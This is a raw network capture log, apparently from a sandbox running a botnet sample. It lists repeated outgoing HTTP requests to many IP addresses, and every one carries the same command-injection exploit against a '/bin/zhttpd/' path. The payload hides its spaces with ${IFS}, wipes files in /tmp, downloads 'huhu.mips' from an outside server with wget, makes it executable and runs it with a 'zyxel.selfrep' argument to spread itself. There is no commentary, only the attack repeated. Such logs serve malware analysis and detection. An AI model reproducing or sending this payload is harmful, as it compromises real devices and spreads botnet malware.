                                                Jan 29, 2024 07:08:06.707731962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8957192.168.2.23494805.238.119.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707767010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8958192.168.2.2360904206.136.79.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707807064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8959192.168.2.235101473.19.131.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707840919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8960192.168.2.235530888.18.45.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707916975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8961192.168.2.234818017.123.62.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707954884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8962192.168.2.2346884101.10.84.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.707984924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8963192.168.2.235417242.244.185.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708049059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8964192.168.2.2342014131.114.168.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708103895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8965192.168.2.233638051.204.207.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708158016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8966192.168.2.233533663.43.196.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708185911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8967192.168.2.234407020.136.227.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708214045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8968192.168.2.2342454213.232.226.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708264112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8969192.168.2.2360168211.24.234.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708326101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8970192.168.2.235544020.197.74.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708355904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8971192.168.2.233319412.37.142.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708401918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8972192.168.2.23400324.236.64.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708460093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8973192.168.2.234295812.25.146.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708494902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8974192.168.2.235706074.192.190.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708534002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8975192.168.2.233928849.8.59.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708560944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8976192.168.2.2338796221.192.201.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708597898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8977192.168.2.2348824143.75.6.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708651066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8978192.168.2.2357456170.65.69.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708698988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8979192.168.2.235713262.73.207.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708739042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8980192.168.2.2336966162.192.200.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708781958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8981192.168.2.2345050100.4.118.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708822966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8982192.168.2.235948293.220.152.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708848953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8983192.168.2.2343660102.199.97.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708889008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8984192.168.2.233328649.137.162.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708926916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8985192.168.2.235015814.180.141.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.708954096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8986192.168.2.234097459.6.240.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709016085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8987192.168.2.233410213.91.60.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709052086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8988192.168.2.2337758199.132.41.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709095001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8989192.168.2.233585824.56.63.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709124088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8990192.168.2.233306457.186.8.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709144115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8991192.168.2.2355418147.239.6.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709196091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8992192.168.2.233449470.248.253.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709220886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8993192.168.2.23351321.32.16.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709265947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8994192.168.2.2349030100.53.91.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709296942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8995192.168.2.235438257.205.124.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709342003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8996192.168.2.2338304160.249.50.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709398985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8997192.168.2.2351920212.91.15.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709429979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8998192.168.2.2333620162.86.228.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709485054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8999192.168.2.233584862.85.222.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709511042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9000192.168.2.2350454178.113.104.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709569931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9001192.168.2.235472066.84.102.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709600925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9002192.168.2.234936632.242.110.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709650993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9003192.168.2.23399125.43.236.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709697962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9004192.168.2.2348366209.213.102.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709714890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9005192.168.2.2350982163.249.176.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709774017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9006192.168.2.2360614198.156.249.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709785938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9007192.168.2.2357902221.194.32.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709827900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9008192.168.2.2333738134.176.236.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709861040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9009192.168.2.2344748166.114.187.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709902048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9010192.168.2.2348058184.63.133.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709923029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9011192.168.2.2360250126.65.209.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709934950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9012192.168.2.233631494.55.26.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.709996939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9013192.168.2.2341240166.254.181.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710045099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9014192.168.2.2360984121.214.231.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710084915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9015192.168.2.235646820.229.99.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710114956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9016192.168.2.234851876.9.238.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710175037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9017192.168.2.2348084108.114.173.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710216045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9018192.168.2.2339878144.228.239.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710249901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9019192.168.2.234833873.101.230.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.710302114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9020192.168.2.235584635.132.28.128443
                                                TimestampBytes transferredDirectionData
